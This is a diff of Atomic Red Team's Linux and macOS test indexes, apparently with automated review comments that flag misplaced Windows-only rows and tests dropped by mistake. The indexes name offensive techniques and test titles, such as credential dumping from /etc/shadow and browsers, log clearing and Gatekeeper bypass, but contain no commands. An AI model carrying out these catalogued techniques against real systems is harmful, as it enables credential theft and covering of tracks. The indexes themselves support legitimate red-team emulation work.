- Atomic Test #9: LaZagne.py - Dump Credentials from Firefox Browser [linux]
- T1557.003 DHCP Spoofing [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
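Review bot: T1552.002 Unsecured Credentials: Credentials in Registry and T1556.002 Modify Authentication Process: Password Filter DLL are Windows-only by construction (the registry and LSA password filters have no Linux counterpart), so these placeholders should be filtered out the same way the test entries are. T1558.004 AS-REP Roasting and T1556.007 Hybrid Identity are reasonable here, since Active Directory techniques are already exercised from Linux hosts elsewhere in this index (for example the Active Directory account-creation tests tagged [linux]).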
@@ -578,18 +657,20 @@
- Atomic Test #6: Copy Private SSH Keys with rsync (freebsd) [linux]
- Atomic Test #7: Copy the users GnuPG directory with rsync [macos, linux]
- Atomic Test #8: Copy the users GnuPG directory with rsync (freebsd) [linux]
+- T1557.001 Adversary-in-the-Middle: LLMNR/NBT-NS Poisoning and SMB Relay [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1003.001 OS Credential Dumping: LSASS Memory [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1110.003 Brute Force: Password Spraying [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1056.003 Web Portal Capture [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1003.005 OS Credential Dumping: Cached Domain Credentials [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1558.001 Steal or Forge Kerberos Tickets: Golden Ticket [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1649 Steal or Forge Authentication Certificates [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
-- [T1552.003 Unsecured Credentials: Bash History](../../T1552.003/T1552.003.md)
- - Atomic Test #1: Search Through Bash History [linux, macos]
- - Atomic Test #2: Search Through sh History [linux]
- [T1552.001 Unsecured Credentials: Credentials In Files](../../T1552.001/T1552.001.md)
- Atomic Test #1: Find AWS credentials [macos, linux]
- Atomic Test #3: Extract passwords with grep [linux, macos]
- Atomic Test #6: Find and Access Github Credentials [linux, macos]
- T1606.001 Web Cookies [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1552.006 Unsecured Credentials: Group Policy Preferences [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1556.008 Network Provider DLL [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1606 Forge Web Credentials [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1621 Multi-Factor Authentication Request Generation [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1212 Exploitation for Credential Access [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
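Review bot: T1552.003 Unsecured Credentials: Bash History is removed together with its two tests (Search Through Bash History [linux, macos], Search Through sh History [linux]); this is one of the most Linux-specific entries in the file and nothing in the diff relocates it, so it should stay. Of the added placeholders, T1003.001 LSASS Memory and T1556.008 Network Provider DLL are Windows-only and should be filtered; T1557.001 LLMNR/NBT-NS Poisoning and SMB Relay, T1558.001 Golden Ticket and T1552.006 Group Policy Preferences target Active Directory and can be exercised from a Linux host, so they are defensible if the PR description states that placeholders are listed by target rather than by executing platform.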
@@ -599,16 +680,19 @@
- Atomic Test #1: SSH Credential Stuffing From Linux [linux]
- Atomic Test #3: SSH Credential Stuffing From FreeBSD [linux]
- T1556.006 Multi-Factor Authentication [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1187 Forced Authentication [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1056 Input Capture [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1557.002 ARP Cache Poisoning [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
-- [T1003.008 OS Credential Dumping: /etc/passwd, /etc/master.passwd and /etc/shadow](../../T1003.008/T1003.008.md)
- - Atomic Test #1: Access /etc/shadow (Local) [linux]
- - Atomic Test #2: Access /etc/master.passwd (Local) [linux]
- - Atomic Test #3: Access /etc/passwd (Local) [linux]
- - Atomic Test #4: Access /etc/{shadow,passwd,master.passwd} with a standard bin that's not cat [linux]
- - Atomic Test #5: Access /etc/{shadow,passwd,master.passwd} with shell builtins [linux]
+- T1558.002 Steal or Forge Kerberos Tickets: Silver Ticket [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1555.004 Credentials from Password Stores: Windows Credential Manager [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1556.001 Domain Controller Authentication [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1556.005 Reversible Encryption [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1111 Multi-Factor Authentication Interception [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1003.003 OS Credential Dumping: NTDS [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1558.003 Steal or Forge Kerberos Tickets: Kerberoasting [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1003.006 OS Credential Dumping: DCSync [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1556 Modify Authentication Process [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1056.004 Input Capture: Credential API Hooking [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
# discovery
- [T1033 System Owner/User Discovery](../../T1033/T1033.md)
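Review bot: T1003.008 OS Credential Dumping: /etc/passwd, /etc/master.passwd and /etc/shadow is removed with all five [linux] tests; that sub-technique exists specifically for Linux and BSD and is the canonical credential-dumping entry for this index, so its removal looks like a generator bug rather than an intended change and should be reverted. Among the additions, T1555.004 Windows Credential Manager, T1003.003 NTDS, T1003.006 DCSync, T1056.004 Credential API Hooking, T1187 Forced Authentication, T1556.001 Domain Controller Authentication and T1556.005 Reversible Encryption are Windows-scoped in ATT&CK and should be filtered like the test entries; T1558.002 Silver Ticket and T1558.003 Kerberoasting can be exercised from Linux against Active Directory and are consistent with the AD tests already in the file.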
@@ -616,6 +700,7 @@
- [T1016.001 System Network Configuration Discovery: Internet Connection Discovery](../../T1016.001/T1016.001.md)
- Atomic Test #2: Check internet connection using ping freebsd, linux or macos [macos, linux]
- T1069 Permission Groups Discovery [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1615 Group Policy Discovery [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1652 Device Driver Discovery [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1087.002 Account Discovery: Domain Account](../../T1087.002/T1087.002.md)
- Atomic Test #23: Active Directory Domain Search [linux]
@@ -658,6 +743,7 @@
- Atomic Test #26: FreeBSD List Kernel Modules [linux]
- T1016.002 System Network Configuration Discovery: Wi-Fi Discovery [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1010 Application Window Discovery [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1087.003 Email Account [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1497.003 Time Based Evasion](../../T1497.003/T1497.003.md)
- Atomic Test #1: Delay execution with ping [linux, macos]
- [T1217 Browser Bookmark Discovery](../../T1217/T1217.md)
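Review bot: `+- T1087.003 Email Account` drops the parent technique name that its sibling row carries (`- [T1087.002 Account Discovery: Domain Account]`), and the same inconsistency shows in the credential-access hunk, where T1555.004 is written with its parent (`Credentials from Password Stores: Windows Credential Manager`) but T1556.001 and T1556.005 are not. Pick one form for sub-technique rows in the generator so the index can be grepped by parent technique. T1087.003 is also an email-platform technique and does not obviously belong in an index whose tests are tagged [linux] and [macos]; check its platform list before keeping the row.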
@@ -666,6 +752,7 @@
- [T1016 System Network Configuration Discovery](../../T1016/T1016.md)
- Atomic Test #3: System Network Configuration Discovery [macos, linux]
- T1087 Account Discovery [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1482 Domain Trust Discovery [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1083 File and Directory Discovery](../../T1083/T1083.md)
- Atomic Test #3: Nix File and Directory Discovery [linux, macos]
- Atomic Test #4: Nix File and Directory Discovery 2 [linux, macos]
@@ -689,6 +776,7 @@
- Atomic Test #4: Discover System Language with localectl [linux]
- Atomic Test #5: Discover System Language by locale file [linux]
- Atomic Test #6: Discover System Language by Environment Variable Query [linux]
+- T1012 Query Registry [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1614 System Location Discovery](../../T1614/T1614.md)
- Atomic Test #2: Get geolocation info through IP-Lookup services using curl freebsd, linux or macos [macos, linux]
- [T1518.001 Software Discovery: Security Software Discovery](../../T1518.001/T1518.001.md)
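Review bot: `+- T1012 Query Registry` cannot apply to this index: the Windows Registry has no counterpart on the Linux and macOS hosts the surrounding tests are tagged for, so a CONTRIBUTE A TEST row here invites contributions that can never be accepted for this platform. Same root cause as the credential-access hunk; fix the platform filter in the generator rather than hand-removing this row.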
@@ -709,55 +797,6 @@
- [T1124 System Time Discovery](../../T1124/T1124.md)
- Atomic Test #3: System Time Discovery in FreeBSD/macOS [linux, macos]
-# execution
-- T1129 Server Software Component [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
-- T1059.007 Command and Scripting Interpreter: JavaScript [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
-- T1204.002 User Execution: Malicious File [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
-- [T1053.003 Scheduled Task/Job: Cron](../../T1053.003/T1053.003.md)
- - Atomic Test #1: Cron - Replace crontab with referenced file [linux, macos]
- - Atomic Test #2: Cron - Add script to all cron subfolders [macos, linux]
- - Atomic Test #3: Cron - Add script to /etc/cron.d folder [linux]
- - Atomic Test #4: Cron - Add script to /var/spool/cron/crontabs/ folder [linux]
-- T1053 Scheduled Task/Job [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
-- T1106 Native API [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
-- T1059 Command and Scripting Interpreter [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
-- T1204 User Execution [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
-- T1072 Software Deployment Tools [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
-- [T1053.006 Scheduled Task/Job: Systemd Timers](../../T1053.006/T1053.006.md)
- - Atomic Test #1: Create Systemd Service and Timer [linux]
- - Atomic Test #2: Create a user level transient systemd service and timer [linux]
- - Atomic Test #3: Create a system level transient systemd service and timer [linux]
-- [T1059.004 Command and Scripting Interpreter: Bash](../../T1059.004/T1059.004.md)
- - Atomic Test #1: Create and Execute Bash Shell Script [linux, macos]
- - Atomic Test #2: Command-Line Interface [linux, macos]
- - Atomic Test #3: Harvest SUID executable files [linux]
- - Atomic Test #4: LinEnum tool execution [linux]
- - Atomic Test #5: New script file in the tmp directory [linux]
- - Atomic Test #6: What shell is running [linux]
- - Atomic Test #7: What shells are available [linux]
- - Atomic Test #8: Command line scripts [linux]
- - Atomic Test #9: Obfuscated command line scripts [linux]
- - Atomic Test #10: Change login shell [linux]
- - Atomic Test #11: Environment variable scripts [linux]
- - Atomic Test #12: Detecting pipe-to-shell [linux]
- - Atomic Test #13: Current kernel information enumeration [linux]
- - Atomic Test #14: Shell Creation using awk command [linux, macos]
- - Atomic Test #15: Creating shell using cpan command [linux, macos]
- - Atomic Test #16: Shell Creation using busybox command [linux]
- - Atomic Test #17: emacs spawning an interactive system shell [linux, macos]
-- T1559 Inter-Process Communication [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
-- T1203 Exploitation for Client Execution [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
-- [T1059.006 Command and Scripting Interpreter: Python](../../T1059.006/T1059.006.md)
- - Atomic Test #1: Execute shell script via python's command mode arguement [linux]
- - Atomic Test #2: Execute Python via scripts [linux]
- - Atomic Test #3: Execute Python via Python executables [linux]
- - Atomic Test #4: Python pty module and spawn function used to spawn sh or bash [linux]
-- T1569 System Services [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
-- T1059.005 Command and Scripting Interpreter: Visual Basic [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
-- T1204.001 Malicious Link [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
-- [T1053.002 Scheduled Task/Job: At](../../T1053.002/T1053.002.md)
- - Atomic Test #2: At - Schedule a job [linux]
-
# impact
- T1561.002 Disk Structure Wipe [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1498.001 Direct Network Flood [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
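Review bot: This hunk deletes the whole `# execution` section, including five techniques that have tests on disk (T1053.003 Cron with 4 tests, T1053.006 Systemd Timers with 3, T1059.004 Bash with 17, T1059.006 Python with 4, T1053.002 At with 1), not only CONTRIBUTE A TEST placeholders. Nothing elsewhere in the patch re-adds them, so after this change the index claims this platform has no execution coverage at all. A regeneration that removes tests which still exist should fail review; add a CI check that every test tagged for this platform in the atomics directory appears in the index, and regenerate once the generator is fixed. The hunk header (`-709,55 +797,6`) makes the size of the loss visible: 49 lines gone from one section.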
@@ -776,8 +815,10 @@
- T1498.002 Reflection Amplification [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1499.002 Service Exhaustion Flood [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1491 Defacement [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1496.002 Bandwidth Hijacking [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1657 Financial Theft [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1491.001 Defacement: Internal Defacement [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1496.001 Compute Hijacking [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1565 Data Manipulation [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1531 Account Access Removal](../../T1531/T1531.md)
- Atomic Test #4: Change User Password via passwd [macos, linux]
@@ -813,6 +854,7 @@
- T1566.002 Phishing: Spearphishing Link [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1566.001 Phishing: Spearphishing Attachment [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1195.003 Compromise Hardware Supply Chain [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1091 Replication Through Removable Media [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1195 Supply Chain Compromise [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1190 Exploit Public-Facing Application [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1659 Content Injection [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
diff --git a/atomics/Indexes/Indexes-Markdown/macos-index.md b/atomics/Indexes/Indexes-Markdown/macos-index.md
index 9725aef8b0..7a87c2a6a8 100644
--- a/atomics/Indexes/Indexes-Markdown/macos-index.md
+++ b/atomics/Indexes/Indexes-Markdown/macos-index.md
@@ -1,53 +1,39 @@
# macOS Atomic Tests by ATT&CK Tactic & Technique
# defense-evasion
+- T1055.011 Process Injection: Extra Window Memory Injection [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1205.002 Socket Filters [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1027.011 Fileless Storage [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1218.011 Signed Binary Proxy Execution: Rundll32 [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1027.009 Embedded Payloads [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
-- T1556.003 Modify Authentication Process: Pluggable Authentication Modules [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1564.012 File/Path Exclusions [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
-- [T1222.002 File and Directory Permissions Modification: FreeBSD, Linux and Mac File and Directory Permissions Modification](../../T1222.002/T1222.002.md)
- - Atomic Test #1: chmod - Change file or folder mode (numeric mode) [linux, macos]
- - Atomic Test #2: chmod - Change file or folder mode (symbolic mode) [linux, macos]
- - Atomic Test #3: chmod - Change file or folder mode (numeric mode) recursively [linux, macos]
- - Atomic Test #4: chmod - Change file or folder mode (symbolic mode) recursively [linux, macos]
- - Atomic Test #5: chown - Change file or folder ownership and group [macos, linux]
- - Atomic Test #6: chown - Change file or folder ownership and group recursively [macos, linux]
- - Atomic Test #7: chown - Change file or folder mode ownership only [linux, macos]
- - Atomic Test #8: chown - Change file or folder ownership recursively [macos, linux]
- - Atomic Test #9: chattr - Remove immutable file attribute [macos, linux]
- - Atomic Test #11: Chmod through c script [macos, linux]
- - Atomic Test #13: Chown through c script [macos, linux]
+- T1216.001 Signed Script Proxy Execution: Pubprn [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1574.007 Path Interception by PATH Environment Variable [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1006 Direct Volume Access [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1564.008 Hide Artifacts: Email Hiding Rules [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1027.013 Encrypted/Encoded File [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1014 Rootkit [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
-- [T1548.003 Abuse Elevation Control Mechanism: Sudo and Sudo Caching](../../T1548.003/T1548.003.md)
- - Atomic Test #1: Sudo usage [macos, linux]
- - Atomic Test #3: Unlimited sudo cache timeout [macos, linux]
- - Atomic Test #5: Disable tty_tickets for sudo caching [macos, linux]
+- T1036.007 Masquerading: Double File Extension [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1548.002 Abuse Elevation Control Mechanism: Bypass User Account Control [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1542.001 Pre-OS Boot: System Firmware [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1574.011 Hijack Execution Flow: Services Registry Permissions Weakness [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1542.003 Bootkit [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1218.013 Mavinject [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1036.005 Masquerading: Match Legitimate Name or Location](../../T1036.005/T1036.005.md)
- Atomic Test #1: Execute a process from a directory masquerading as the current parent directory. [macos, linux]
- T1036.008 Masquerade File Type [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1564 Hide Artifacts [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1484.002 Domain Trust Modification [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1562.009 Impair Defenses: Safe Boot Mode [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1497.001 Virtualization/Sandbox Evasion: System Checks](../../T1497.001/T1497.001.md)
- Atomic Test #4: Detect Virtualization Environment (MacOS) [macos]
-- [T1070.002 Indicator Removal on Host: Clear FreeBSD, Linux or Mac System Logs](../../T1070.002/T1070.002.md)
- - Atomic Test #1: rm -rf [macos, linux]
- - Atomic Test #3: Delete log files using built-in log utility [macos]
- - Atomic Test #4: Truncate system log files via truncate utility [macos]
- - Atomic Test #6: Delete log files via cat utility by appending /dev/null or /dev/zero [macos]
- - Atomic Test #8: System log file deletion via find utility [macos]
- - Atomic Test #9: Overwrite macOS system log via echo utility [macos]
- - Atomic Test #11: Real-time system log clearance/deletion [macos]
- - Atomic Test #12: Delete system log files via unlink utility [macos]
- - Atomic Test #14: Delete system log files using shred utility [macos]
- - Atomic Test #15: Delete system log files using srm utility [macos]
- - Atomic Test #16: Delete system log files using OSAScript [macos]
- - Atomic Test #17: Delete system log files using Applescript [macos]
+- T1218.004 Signed Binary Proxy Execution: InstallUtil [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1027.008 Stripped Payloads [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
-- [T1553.001 Subvert Trust Controls: Gatekeeper Bypass](../../T1553.001/T1553.001.md)
- - Atomic Test #1: Gatekeeper Bypass [macos]
+- T1574.001 Hijack Execution Flow: DLL Search Order Hijacking [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1553.002 Code Signing [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
-- T1036.009 Break Process Trees [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1222.001 File and Directory Permissions Modification: Windows File and Directory Permissions Modification [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1574.014 AppDomainManager [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1218.007 Signed Binary Proxy Execution: Msiexec [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1556.002 Modify Authentication Process: Password Filter DLL [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1070.007 Clear Network Connection History and Configurations [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1070.003 Indicator Removal on Host: Clear Command History](../../T1070.003/T1070.003.md)
- Atomic Test #1: Clear Bash history (rm) [linux, macos]
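Review bot: The macOS index loses four techniques that have macOS tests (T1222.002 with 11 chmod/chown/chattr tests, T1548.003 Sudo and Sudo Caching with 3, T1070.002 with 12 log-clearing tests of which 11 are tagged [macos] only, T1553.001 Gatekeeper Bypass with its single [macos] test) plus T1556.003 PAM and T1036.009, and gains rows that cannot execute on macOS (`+- T1218.011 Signed Binary Proxy Execution: Rundll32`, `+- T1548.002 ... Bypass User Account Control`, `+- T1218.013 Mavinject`, `+- T1574.011 ... Services Registry Permissions Weakness`). Gatekeeper and sudo entries are what a macOS user opens this index for, so this is a regression in the one file that should be most macOS-specific. Regenerate after fixing the platform filter; the hunk header `-1,53 +1,39` shows the section shrinking even as Windows rows are added.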
@@ -56,6 +42,7 @@
- Atomic Test #6: Clear history of a bunch of shells [linux, macos]
- Atomic Test #7: Clear and Disable Bash History Logging [linux, macos]
- Atomic Test #8: Use Space Before Command to Avoid Logging to History [linux, macos]
+- T1202 Indirect Command Execution [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1140 Deobfuscate/Decode Files or Information](../../T1140/T1140.md)
- Atomic Test #3: Base64 decoding with Python [linux, macos]
- Atomic Test #4: Base64 decoding with Perl [linux, macos]
@@ -64,6 +51,7 @@
- Atomic Test #9: Linux Base64 Encoded Shebang in CLI [linux, macos]
- Atomic Test #10: XOR decoding and command execution using Python [linux, macos]
- T1562 Impair Defenses [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1055.003 Thread Execution Hijacking [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1036 Masquerading [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1070.008 Email Collection: Mailbox Manipulation](../../T1070.008/T1070.008.md)
- Atomic Test #3: Copy and Delete Mailbox Data on macOS [macos]
@@ -78,44 +66,67 @@
- Atomic Test #4: Modify file timestamps using reference file [linux, macos]
- Atomic Test #9: MacOS - Timestomp Date Modified [macos]
- T1620 Reflective Code Loading [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1480.002 Mutual Exclusion [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1564.011 Ignore Process Interrupts [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1497.003 Time Based Evasion](../../T1497.003/T1497.003.md)
- Atomic Test #1: Delay execution with ping [linux, macos]
+- T1218.003 Signed Binary Proxy Execution: CMSTP [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1562.002 Impair Defenses: Disable Windows Event Logging [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1218.002 Signed Binary Proxy Execution: Control Panel [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1550 Use Alternate Authentication Material [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1562.004 Impair Defenses: Disable or Modify System Firewall [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1553.003 Subvert Trust Controls: SIP and Trust Provider Hijacking [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1556.007 Hybrid Identity [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1218.015 Electron Applications [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1207 Rogue Domain Controller [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1553.006 Subvert Trust Controls: Code Signing Policy Modification [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1112 Modify Registry [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1574.008 Hijack Execution Flow: Path Interception by Search Order Hijacking [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1027.001 Obfuscated Files or Information: Binary Padding](../../T1027.001/T1027.001.md)
- Atomic Test #1: Pad Binary to Change Hash - Linux/macOS dd [linux, macos]
- Atomic Test #2: Pad Binary to Change Hash using truncate command - Linux/macOS [linux, macos]
+- T1484.001 Domain Policy Modification: Group Policy Modification [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1078.001 Valid Accounts: Default Accounts](../../T1078.001/T1078.001.md)
- Atomic Test #3: Enable Guest Account on macOS [macos]
-- [T1574.006 Hijack Execution Flow: LD_PRELOAD](../../T1574.006/T1574.006.md)
- - Atomic Test #3: Dylib Injection via DYLD_INSERT_LIBRARIES [macos]
+- T1070.001 Indicator Removal on Host: Clear Windows Event Logs [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1222 File and Directory Permissions Modification [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1548 Abuse Elevation Control Mechanism [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
-- [T1548.001 Abuse Elevation Control Mechanism: Setuid and Setgid](../../T1548.001/T1548.001.md)
- - Atomic Test #1: Make and modify binary from C source [macos, linux]
- - Atomic Test #3: Set a SetUID flag on file [macos, linux]
- - Atomic Test #5: Set a SetGID flag on file [macos, linux]
+- T1134.002 Create Process with Token [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1218.008 Signed Binary Proxy Execution: Odbcconf [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
